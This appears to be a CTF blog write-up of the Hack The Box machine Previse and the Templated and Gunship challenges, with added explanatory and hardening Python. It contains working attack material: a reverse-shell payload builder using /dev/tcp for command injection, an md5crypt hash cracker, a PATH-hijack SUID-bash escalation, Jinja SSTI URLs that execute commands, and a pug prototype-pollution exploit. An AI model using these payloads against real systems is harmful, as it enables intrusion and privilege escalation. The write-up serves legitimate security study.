HTB Weekly Box Practice Series -- Previse + 2 Challenges



Box: Previse

Target address: 10.10.11.104

Nmap scan:

└─$ nmap -p- --min-rate=1000 -sT -T4 10.10.11.104
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 08:03 EST
Warning: 10.10.11.104 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.104
Host is up (0.25s latency).
Not shown: 65525 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
6660/tcp  filtered unknown
8468/tcp  filtered unknown
10509/tcp filtered unknown
11881/tcp filtered unknown
15833/tcp filtered unknown
21436/tcp filtered unknown
32761/tcp filtered unknown
59640/tcp filtered unknown

Ports 80 and 22 are open, so this should be a web-focused box.


It is just a login page; I tried running sqlmap against it for injection.

Also note the footer carries social-engineering-relevant information, CREATED BY M4LWHERE, which may be useful.

sqlmap found nothing, but directory brute-forcing did turn up something, as follows:

I used dirbuster with the wordlist shipped with Kali; note that other wordlists may not find these paths.


Visiting any of these links redirects to the login page. Intercepting the 302 in Burp shows that the server returns the full page body before the redirect takes effect (the redirect is only enforced by the browser). I saved the create-user form and tried to create a new user; that did not work directly.


By intercepting the response in Burp and changing the 302 to 200 OK, the registration page renders; submitting the form with the same bypass registers the account.


The file upload page lets you download the source code archive.

Auditing the source reveals an RCE point; exploit it directly to get a reverse shell.

log.php line 19:

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;
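To show why the line above is exploitable and what the fix looks like, here is an added Python example (not code from the Previse source or from this writeup). It models the exec() call with `echo` standing in for the Python script so it runs anywhere, allow-lists the delimiter in the hardened version, and builds the kind of `delim` value that appends a reverse shell to the command. The delimiter names, LHOST and LPORT are assumptions; the page only shows that `$_POST['delim']` is interpolated unquoted.

```python
import base64
import subprocess

# Assumption (not from the Previse source): the form offers a fixed set of
# named delimiters, so an allow-list is the natural server-side fix.
ALLOWED_DELIMS = {"comma", "space", "tab"}


def run_vulnerable(delim: str) -> str:
    """Mirror log.php: the delimiter lands unquoted in a shell command line.

    'echo' stands in for '/usr/bin/python /opt/scripts/log_process.py' so the
    demo runs anywhere; the shell parses the string exactly the same way.
    """
    cmd = f"echo processing {delim}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_hardened(delim: str) -> str:
    """Allow-list the value and pass it as an argv element, never through a shell."""
    if delim not in ALLOWED_DELIMS:
        raise ValueError(f"invalid delimiter: {delim!r}")
    out = subprocess.run(["echo", "processing", delim], capture_output=True, text=True)
    return out.stdout


def build_delim_payload(lhost: str, lport: int) -> str:
    """Value for the 'delim' POST field that appends a reverse shell.

    The inner command is base64-encoded so that quotes, '>&' and /dev/tcp
    survive form encoding and do not disturb the surrounding command line.
    lhost/lport are placeholders for the attacker's listener.
    """
    rev = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    b64 = base64.b64encode(rev.encode()).decode()
    return f"comma; echo {b64} | base64 -d | bash"


def decode_payload(payload: str) -> str:
    """Recover the shell command hidden inside a payload from build_delim_payload."""
    b64 = payload.split("echo ", 1)[1].split(" |", 1)[0]
    return base64.b64decode(b64).decode()


if __name__ == "__main__":
    print(run_vulnerable("comma; echo INJECTED"), end="")
    print(build_delim_payload("10.10.14.5", 4444))
```

The reverse-shell payload is only meaningful against the real target; the local run just shows that the `;` ends the intended command and that the allow-listed version refuses the same input.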


Reading user.txt fails for lack of permission, so I wrote a one-line webshell, connected with AntSword, and prepared to escalate privileges.

config.php in the downloaded source gives the database credentials. A test connection from AntSword works, so I tried UDF privilege escalation.


Query the MySQL plugin directory:

show variables like '%plugin%';
/usr/lib/mysql/plugin/

Write a shared library into it:

SELECT  INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

This fails: no permission to write there. Querying the users table instead returns a username and password hash, the same user mentioned earlier; from the source we know it is a salted MD5 (md5crypt, the $1$ format).

Username and password hash from the database:

m4lwhere
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

Crack it with hashcat:

hashcat.exe -a 0 -m 500 hash.txt --wordlist ..\wordlists\rockyou.txt

Or john on Kali:

sudo john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Result:

ilovecody112235!
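As an added example (not from the writeup), the following Python implements md5crypt itself, which is what the `$1$` prefix denotes (hashcat mode 500), and runs a dictionary attack against the hash above with a small constructed wordlist standing in for rockyou.txt. The salt is taken as raw UTF-8 bytes: the 🧂 emoji alone is four of the eight salt bytes, so the hash is only reproducible when the salt is handled as bytes rather than characters.

```python
import hashlib

# md5crypt ("$1$") as produced by glibc/PHP crypt(). Added example, not code
# from the Previse source.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> str:
    """crypt(3)-style base64: n characters, least-significant 6 bits first."""
    chars = []
    for _ in range(n):
        chars.append(ITOA64[v & 0x3F])
        v >>= 6
    return "".join(chars)


def md5crypt(password: str, salt: str) -> str:
    pw = password.encode()
    sb = salt.encode()            # raw bytes: "🧂llol" is exactly 8 bytes
    if len(sb) > 8:
        raise ValueError("md5crypt salt is at most 8 bytes")
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + sb)
    alt = hashlib.md5(pw + sb + pw).digest()
    remaining = len(pw)
    while remaining > 0:              # as many bytes of alt as the password has
        ctx.update(alt[: min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                        # one byte per bit of the length
        ctx.update(b"\x00" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()

    for i in range(1000):             # fixed 1000-round stretching
        rnd = hashlib.md5()
        rnd.update(pw if i & 1 else final)
        if i % 3:
            rnd.update(sb)
        if i % 7:
            rnd.update(pw)
        rnd.update(final if i & 1 else pw)
        final = rnd.digest()

    f = final
    enc = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$1${salt}${enc}"


def salt_of(hash_str: str) -> str:
    """Extract the salt from '$1$<salt>$<hash>'."""
    parts = hash_str.split("$")
    if len(parts) != 4 or parts[1] != "1":
        raise ValueError("not an md5crypt hash")
    return parts[2]


def crack(target: str, wordlist):
    """Dictionary attack: return the first word whose md5crypt matches target."""
    salt = salt_of(target)
    for word in wordlist:
        if md5crypt(word, salt) == target:
            return word
    return None


TARGET_HASH = "$1$🧂llol$DQpmdvnb7EeuO6UaqRItf."
# Constructed stand-in for rockyou.txt; a real run streams the file line by line.
WORDLIST = ["password", "m4lwhere", "ilovecody", "ilovecody112235!"]

if __name__ == "__main__":
    print(crack(TARGET_HASH, WORDLIST))
```

At roughly two MD5 calls per round this is only useful for understanding the format; hashcat or john remain the tools for a real wordlist run.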

SSH login with that password succeeds; user.txt obtained.


Next comes privilege escalation. Check the current user's sudo rights:

m4lwhere@previse:/usr/lib/mysql/plugin$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh

Script contents:

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

Looking at /opt/scripts/access_backup.sh, it invokes commands (gzip, and date inside the command substitution) by bare name rather than absolute path, so it may be vulnerable to PATH injection.

Because the script resolves gzip through $PATH, it is exposed to $PATH manipulation, which we can use to obtain a root shell.

I created a fake binary with the same name as the one the script calls (gzip), containing a script that copies /bin/bash and sets the SUID bit on the copy. Then I prepended /tmp to $PATH; since $PATH is searched left to right, the script runs the gzip from /tmp.

m4lwhere@previse:/dev/shm$ cd /tmp

m4lwhere@previse:/tmp$ cat << EOF > gzip
> #!/bin/bash
> cp /bin/bash /tmp/c
> chmod u+s /tmp/c
> EOF

m4lwhere@previse:/tmp$ ls
gzip
systemd-private-853c08c1d8d946119f9837cdefc0a557-apache2.service-pm21Fe
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-resolved.service-3c55o7
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-timesyncd.service-nns0jM
vmware-root_848-2697663887

m4lwhere@previse:/tmp$ chmod +x gzip 

m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH

m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh 
[sudo] password for m4lwhere: 

m4lwhere@previse:/tmp$ ls
c
gzip
systemd-private-853c08c1d8d946119f9837cdefc0a557-apache2.service-pm21Fe
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-resolved.service-3c55o7
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-timesyncd.service-nns0jM
vmware-root_848-2697663887

m4lwhere@previse:/tmp$ ./c -p
c-4.4# whoami
root
c-4.4# cat /root/
.bash_history  .cache/        .local/        root.txt       .viminfo       
.bashrc        .gnupg/        .profile       .ssh/          
c-4.4# cat /root/root.txt 
b31cb56b0ceccb7ada693f49dec73d15

Alternatively, change the fake gzip's contents to chmod u+s /bin/bash so that bash itself becomes a SUID file; that works too.

The -p option:

By default, when bash starts and finds that the euid does not match the uid, it resets the euid (i.e. the one granted by SUID) to the real uid. With -p, it keeps the euid.
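As an added example (not part of the writeup), the Python below automates the check that led to this escalation: it lists every command a sudo-able script resolves through $PATH (for access_backup.sh that is both gzip and date), reports whether the script pins PATH itself, and demonstrates the left-to-right lookup with a throwaway fake gzip in a temporary directory. The hardened script variant is an assumption about how one would fix it, not taken from the box.

```python
import os
import re
import shutil
import stat
import tempfile

# Constructed copy of the relevant lines of /opt/scripts/access_backup.sh.
ACCESS_BACKUP_SH = r"""#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
"""

# Assumed fix (not from the box): pin PATH and call binaries by absolute path.
HARDENED_SH = r"""#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
/bin/gzip -c /var/log/apache2/access.log > /var/backups/$(/bin/date --date="yesterday" +%Y%b%d)_access.gz
"""

# Words that are shell syntax or builtins, not PATH lookups.
SHELL_WORDS = {"if", "then", "else", "fi", "for", "do", "done", "while", "case", "esac",
               "export", "exit", "cd", "echo", "set", "[", "[[", "test", "!"}


def bare_commands(script: str) -> set:
    """Heuristic: command words resolved through $PATH (no leading / or ./).

    Each line is split at ';', '|', '&', '$(' and backticks so commands inside
    substitutions such as $(date ...) are seen as well.
    """
    found = set()
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for seg in re.split(r"\$\(|`|[;|&]+", line):
            toks = seg.split()
            if not toks:
                continue
            cmd = toks[0]
            if cmd in SHELL_WORDS or "=" in cmd or cmd.startswith(("/", "./")):
                continue
            found.add(cmd)
    return found


def pins_path(script: str) -> bool:
    """True if the script assigns PATH itself (so the caller's PATH is irrelevant)."""
    return re.search(r"^\s*(export\s+)?PATH=", script, re.M) is not None


def hijackable(script: str) -> set:
    """Bare commands an attacker who controls PATH could replace."""
    return set() if pins_path(script) else bare_commands(script)


def attacker_dir_wins(cmd: str = "gzip") -> bool:
    """Show the lookup order: an executable in a directory placed first in PATH wins.

    Creates a fake `cmd` in a temporary directory and asks shutil.which where
    the name resolves with that directory prepended, i.e. export PATH=/tmp:$PATH.
    The fake file is never executed here.
    """
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, cmd)
        with open(fake, "w") as fh:
            fh.write("#!/bin/bash\ncp /bin/bash /tmp/c && chmod u+s /tmp/c\n")
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
        resolved = shutil.which(cmd, path=d + os.pathsep + os.environ.get("PATH", ""))
        return resolved is not None and os.path.dirname(resolved) == d


if __name__ == "__main__":
    print("hijackable:", sorted(hijackable(ACCESS_BACKUP_SH)))
    print("hardened:", sorted(hijackable(HARDENED_SH)))
    print("attacker dir wins:", attacker_dir_wins())
```

The same audit applies to anything run as root from cron or sudo; note that sudo's `secure_path` only helps when sudo is the caller, and the script here does nothing to protect itself once bash resolves `gzip`.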

Challenge - Templated

Can you exploit this simple mistake?

The service is Flask; testing confirms SSTI (server-side template injection).


Find a usable gadget chain:

http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()%7D%7D
http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()[133]%7D%7D


http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__(%22os%22).popen(%22ls%22).read()')%7D%7D

Execute a command to read the flag:
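The index 133 is specific to the challenge's interpreter and import order; on another Python build the same class sits elsewhere in the list. As an added example (not from the writeup), the Python below takes the output of the first URL above (the dump of `__subclasses__()`), locates a class by name, and builds the encoded path for the third URL; `verify_locally` runs the same lookup against the interpreter it executes in. The catch-all route and the `os._wrap_close` gadget are assumptions; the page does not name the class found at index 133 on the challenge host.

```python
import re
from urllib.parse import quote

# Same gadget chain as the writeup: "".__class__.__bases__[0] is object, and
# one of its subclasses has a Python-level __init__ whose globals expose
# __builtins__ and therefore eval. Added example, not the challenge's code.
DUMP_TEMPLATE = '{{"".__class__.__bases__[0].__subclasses__()}}'
RCE_TEMPLATE = (
    '{{"".__class__.__bases__[0].__subclasses__()[%d]'
    ".__init__.__globals__['__builtins__']['eval']"
    "('__import__(\"os\").popen(\"%s\").read()')}}"
)


def subclass_entries(dump: str) -> list:
    """Split the rendered repr of __subclasses__() into one string per class.

    Entries look like <class 'qualified.name'>, so the list is cut on the
    ', <' separator instead of parsing nested brackets.
    """
    body = dump.strip()
    if body.startswith("[") and body.endswith("]"):
        body = body[1:-1]
    return [e if e.startswith("<") else "<" + e for e in body.split(", <")]


def index_of(dump: str, qualname: str) -> int:
    """Index into __subclasses__() of the class named qualname, or -1."""
    needle = f"'{qualname}'"
    for i, entry in enumerate(subclass_entries(dump)):
        if needle in entry:
            return i
    return -1


def build_rce_path(index: int, command: str) -> str:
    """URL path for the (assumed) catch-all route, template expression percent-encoded."""
    return "/" + quote(RCE_TEMPLATE % (index, command), safe="")


def verify_locally(qualname: str = "os._wrap_close") -> bool:
    """Check that the parsed index lands on the named class in this interpreter
    and that its __init__ globals really reach eval."""
    subs = "".__class__.__bases__[0].__subclasses__()
    idx = index_of(repr(subs), qualname)
    if idx < 0:
        return False
    cls = subs[idx]
    if f"{cls.__module__}.{cls.__qualname__}" != qualname:
        return False
    builtins = cls.__init__.__globals__["__builtins__"]
    ev = builtins["eval"] if isinstance(builtins, dict) else builtins.eval
    return ev("1+1") == 2


if __name__ == "__main__":
    subs = "".__class__.__bases__[0].__subclasses__()
    i = index_of(repr(subs), "os._wrap_close")
    print(i, build_rce_path(i, "ls"))
```

In practice one fetches the dump URL from the target, pastes the response into `index_of`, and only then fixes the index in the final payload.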


Challenge - Gunship

CHALLENGE DESCRIPTION

A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶

The challenge provides the source. From the library versions in package.json and the code, this should be prototype pollution.

Code:

const path              = require('path');
const express           = require('express');
const pug                = require('pug');
const { unflatten }     = require('flat');
const router            = express.Router();

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));
});

router.post('/api/submit', (req, res) => {
    const { artist } = unflatten(req.body);

    if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
        return res.json({
            'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
        });
    } else {
        return res.json({
            'response': 'Please provide us with the full name of an existing member.'
        });
    }
});

module.exports = router;

package.json

{
    "name": "gunship",
    "version": "1.0.0",
    "description": "",
    "main": "index.js",
    "scripts": {
        "start": "node index.js",
        "dev": "nodemon .",
        "test": "echo \"Error: no test specified\" && exit 1"
    },
    "keywords": [],
    "authors": [
        "makelaris",
        "makelarisjr"
    ],
    "dependencies": {
        "express": "^4.17.1",
        "flat": "5.0.0",
        "pug": "^3.0.0"
    }
}

Looking into it, the problem lies in pug; reference article:

https://blog.p6.is/AST-Injection/#Pug

Build the exploit:

import requests

TARGET_URL = 'http://139.59.165.154:31157'

# make pollution
r=requests.post(TARGET_URL + '/api/submit', json = {
    "artist.name":"Haigh",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('cat flag* > static/js/flag.js')"
    }
})
# execute
requests.get(TARGET_URL)
print(r.text)

Fetch the JS file to get the flag.
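As an added example (not the challenge's or flat's own code), here is a Python model of how flat's unflatten() turns a dotted key such as `__proto__.block` into a nested object, a filtered variant that drops prototype-chain segments (the kind of check later flat releases added), and a small detector one can run over request bodies. In JavaScript the nested write lands on Object.prototype because `{}['__proto__']` is the prototype object; the Python dict only illustrates the key handling, which is where the fix belongs.

```python
# Key segments that reach the prototype chain in JavaScript.
DANGEROUS = {"__proto__", "constructor", "prototype"}


def unflatten(flat: dict) -> dict:
    """Model of flat 5.0.0 unflatten(): dotted keys become nested objects, no filtering."""
    out = {}
    for key, value in flat.items():
        parts = key.split(".")
        node = out
        for part in parts[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[parts[-1]] = value
    return out


def unflatten_safe(flat: dict) -> dict:
    """Same expansion, but any key containing a dangerous segment is dropped."""
    out = {}
    for key, value in flat.items():
        parts = key.split(".")
        if DANGEROUS & set(parts):
            continue
        node = out
        for part in parts[:-1]:
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        node[parts[-1]] = value
    return out


def pollution_keys(flat: dict) -> list:
    """Flattened keys that touch the prototype chain; useful as a request-log detector."""
    return [k for k in flat if DANGEROUS & set(k.split("."))]


# Constructed request body mirroring the exploit above (command shortened).
EXPLOIT_BODY = {
    "artist.name": "Haigh",
    "__proto__.block": {
        "type": "Text",
        "line": "process.mainModule.require('child_process').execSync('id')",
    },
}

if __name__ == "__main__":
    print(unflatten(EXPLOIT_BODY))
    print(unflatten_safe(EXPLOIT_BODY))
    print(pollution_keys(EXPLOIT_BODY))
```

The detector is deliberately key-based: the payload's value is a harmless-looking object, and it is only the path `__proto__.block` that turns it into a write to every object in the process.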

HTB{wh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3!!}

Author: LANVNAL
Copyright: Unless otherwise stated, all posts on this blog are licensed under CC BY 4.0. Please credit LANVNAL when reposting.